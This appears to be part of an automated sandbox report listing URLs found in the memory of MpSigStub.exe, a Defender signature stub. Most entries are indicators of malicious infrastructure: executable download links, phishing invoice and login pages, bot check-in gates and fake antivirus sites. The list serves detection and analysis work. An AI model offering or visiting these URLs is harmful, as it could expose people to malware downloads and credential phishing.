Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://u.to/sqivdw)
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://ubercancellationfeelawsuit.com/p.png
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://ucil-bd.com/swfobject/alape/index.php)
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: http://uidacrtsppxece.com/ioir.png
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://uiltime.info/?c=v3
Source: MpSigStub.exe, 00000023.00000003.18340030081.0000015B1AB4D000.00000004.00000001.sdmp String found in binary or memory: http://ulink7.dudu.com/
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp String found in binary or memory: http://ulog.cleaner2009pro.com/?action=
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://ultimatepropertiesllc.com/ike.exe
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: http://uncpbisdegree.com/download3.php?q=
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: http://uncpbisdegree.com/download4.php?q=
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://uniblue.com
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it//?ext=824&pid=946
Source: MpSigStub.exe, 00000023.00000003.18282239876.0000015B1C55A000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it/?pid=21&ext=bcool
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.mysafesavings.com
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: http://union.hao3603.com/api/down
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://unitedcrew.netd
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: http://unstat.baidu.com
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://unstiff.pw
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://up.dev-point.com/uploads/
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://upd.lop.com/upd/check
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://upd.zone-media.com/upd/check
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://update.7h4uk.com:443/antivirus.php
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://update.cnnewmusic.com/get_gif.php?
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://update.qyule.com/setup.exe
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://update.sykehuspartner.no/splunk/
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: http://update.utorrent.com/uninstall?type=%s-%U&h=%s&v=%d
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://update.windowssettings.org/patchwmp/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp String found in binary or memory: http://update.xiaoshoupeixun.com/tsbho.ini
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://updates-spreadwork.pw
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://updates.winsoftware.com/
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp String found in binary or memory: http://upgrade.onestepsearch.net
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://upload.exe
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://uploader.sx/uploads/2018/5b9ed5bc.exe
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://uprevoy.com/
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://urels.ml/sokha2.php
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://url.cn/
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://url.fzpmh.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://ursreklam.com/wp-content/themes/sketch/vall1/agh.doc
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://us.onesoftperday.com
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: http://usa-national.info/gpu/band/grumble.dot
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://usb.mine.nu/p.php
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp String found in binary or memory: http://usd.881515.net/down/1.exe
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://user.qzone.qq.com/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://users.cpadown.com/ktv/
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://ushuistov.net/cgi-bin/check/autoaff
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: http://utclient.utorrent.com/pro/bittorrent/
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: http://utclient.utorrent.com/pro/flow/trial/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://uwibami.com/indexx.php)
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://uxos.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://v.baidu.com/srh.php?tn=oliver1_dg&word=%s
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://v.bddp.net
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://v.iask.com/v?tag=&k=%s
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://valentinadaddato.it//wp-includes/pomo/xcl/excelz/index.php
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://venus.ge/ds/1.gif
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://vequiato.sites.uol.com.br/
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://verred.net/?1309921
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://verticalagriculture.net/files/csrss.jar
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://vesterm.freehostia.com
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://vidalaviva.com/
Source: MpSigStub.exe, 00000023.00000003.18315624417.0000015B1B02C000.00000004.00000001.sdmp String found in binary or memory: http://vidareal2010.pisem.su/imglog.exe
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://video-song-player-install-now.com/
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://videosoftonline.com/download
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://vidquick.info/cgi/
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://vidscentral.net/inc/6348852
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://vidscentral.net/inc/63488524/media_codecs/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://view.superweb.ws/site/folder.exe
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://vip.escritorioactivo.com/controlContinuidad.htm
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://vip.fanyarightway.com/360/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://vip.zeiwang.cn/images/logo.gif
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://vip9646.com
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://vipp.sitegoogle.cn/superj.asp
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://visuawsdyorganizationforyoungbraine19hqs.duckdns.org/document/invoice_
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://vjdevelopers.com/ad/index.html)
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://vkontakte.ru/login.php?
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://vnmxjcx.com/config.ini
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://vnz2107.ru
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://vod.7ibt.com/index.php?url=
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://voesttalpine.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://voguextra.com
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://volcanox.comxa.com/dix/disk
Source: MpSigStub.exe, 00000023.00000003.18327831413.0000015B1A891000.00000004.00000001.sdmp String found in binary or memory: http://w.nanweng.cn/qy/gl
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://w.robints.us/614.htmlwidth=0height=0
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://w.robints.us/cnzz.htmlwidth=0height=0
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://w.robints.us/jf.htmlwidth=0height=0
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://w.w3c4f.com
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://w.woc4b.com
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://w.x.baidu.com/go/
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://w0rms.com/sayac.js
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gfbs
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://wallwishers.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://warmsnugfat.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://warningjustice.com/z.html#ymxpy2hazwfzdg1hbi5jb20=
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://watchbands365.com/wp-includes/css/pdfview/index.html
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://watchchurchonline.com/flc4/llc/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://weather.265.com/%s
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://weather.265.com/get_weather.php?action=get_city
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://web.nba1001.net:8888/tj/tongji.js
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp String found in binary or memory: http://web/cdr/DISP/plazma_2/backend/phone.php
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp String found in binary or memory: http://webapp.torntv.com
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://webpatch.ragnarok.co.kr/
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://websearch.gettango.com/?
Source: MpSigStub.exe, 00000023.00000003.18344332390.0000015B1C1B7000.00000004.00000001.sdmp String found in binary or memory: http://webspyshield.com/a/setup.exe
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://webye163.cn/hz
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: http://weeshoppi.com/wp-includes/id4/m4hg5vm7xsh6utv.exe
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://wef.grassrooters.org/index.php?xhimdbkblrjlcia
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://wermeer.cn/wermeer/report.php?title=
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://westcost0.altervista.org/w/api2.php?a=
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://western.net.pk
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://westernpinesbelize.com/lmb/login%20pdf.html
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://wevx.xyz/post.php?uid=
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://wewewewewesesesesasbacwederffggffddsss.duckdns.org/svch/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://wgdteam.jconserv.net
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://whatami.us.to/tc
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://whatismyip.com/automation/n09230945.asp
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://whenyouplaygood.com/s/gate.php?a
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://white.shougouji.top
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: http://whoisthis.100webspace.net/a.php?post=
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://wijmo.com/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://willy.pro.br/download
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://win-eto.com/hp.htm
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://win32.x10host.com/
Source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp String found in binary or memory: http://win7updates.com/
Source: MpSigStub.exe, 00000023.00000003.18303365623.0000015B1C05E000.00000004.00000001.sdmp String found in binary or memory: http://winantiviruspro.net/buy.php?affid=
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp String found in binary or memory: http://winbutler.com/a.php
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://windowstation.bar/opzi0na1la.dll
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://wingsfinger.com?
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://wingsfingers.com?
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://winmediapackage.com/rd/out.php
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://winshow.biz/feat/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://wizzcaster.com/api/v
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://wmr-moneys.org/config/line.gif
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: http://woah90s.com/hqalzrakueii/nbsa
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://wojass.unitedcrew.netd
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://wordfiletransfertocustomer.mangospot.net/-.......................................-...........
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://wordgroup.bounceme.net/9cb6541e5b0d/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://workwear.shoppages.eu/tools/adobe.ph)
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://world4freeblog.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://worldnit.com/ofi.exe
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://worm.ws
Source: MpSigStub.exe, 00000023.00000003.18342184671.0000015B1C358000.00000004.00000001.sdmp String found in binary or memory: http://worm.ws/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://wp.fanchen.cc/paid-invoice/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://wpitcher.com
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://wpr.mko.waw.pl/uploads/scheduler.txt
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://wsdygreenkegheedahatakankeadeshnaa30gas.duckdns.org/document/invoice_
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://wsfgfdgrtyhgfd.net//adv//
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://wsfgfdgrtyhgfd.net/adv/
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: http://wsus.chrobinson.com/scriptstothelocalcomputer
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://wtfismyip.com/text)echo
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://wvpt.net/invoice-receipt/
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://ww.fbi.gov/worldwidedlogs/addtobase.asp
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://wwsw.friendgreeting.net/pickup.aspx?code=
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://www-afc.chrom3.net/images/
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: http://www-search.net/?
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.%domain%/updates/check.html
Source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/MyFriends.jsp
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/mail/MailCompose.jsp
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/mail/MailCompose.jsp?ToMemberId=%s
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/searchbar.html
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.114.
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://www.114Oldest.com/zz/mm.htm
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://www.126.com/
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.17173.com/
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp String found in binary or memory: http://www.178gg.com/lianjie/
Source: MpSigStub.exe, 00000023.00000003.18402095009.0000015B1AE5E000.00000004.00000001.sdmp String found in binary or memory: http://www.180searchassistant.com/
Source: MpSigStub.exe, 00000023.00000003.18402095009.0000015B1AE5E000.00000004.00000001.sdmp String found in binary or memory: http://www.180searchassistant.com/a
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.1882361.55freehost.com/voicemail.html)
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://www.22apple.com/?utm_source=b&ch=sof&uid=
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://www.22teens.com/
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.2345.com
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.2345.com/?18181
Source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp String found in binary or memory: http://www.2828hfdy.com/bak.txt
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://www.3000.ws/
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://www.31334.info/1stupload.php
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.3322.org/dyndns/getip
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://www.3800cc.com/
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://www.455465x.com/test/IP.asp
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.4dots-software.com/installmonetizer/emptyfoldercleaner.php/silentget
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://www.4shared.com/download/-u-Zcvyfce/SkyLinev5.exe
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://www.4shared.com/download/TZDZz2RBba/aTubeWD9.exe
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://www.4threquest.me/
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://www.4threquest.me/310714d/291014_nj.exe?
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://www.4threquest.me/310714d/310714_br.exe?
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.51jetso.com
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://www.51jetso.com/
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://www.520hack.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://www.52CPS.COM/goto/mm.Htm
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: http://www.58816.com
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.5qbb.com
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://www.5z8.info/--initiate-credit-card-xfer--_g5l2og_autoinstall
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.6781.com/city/
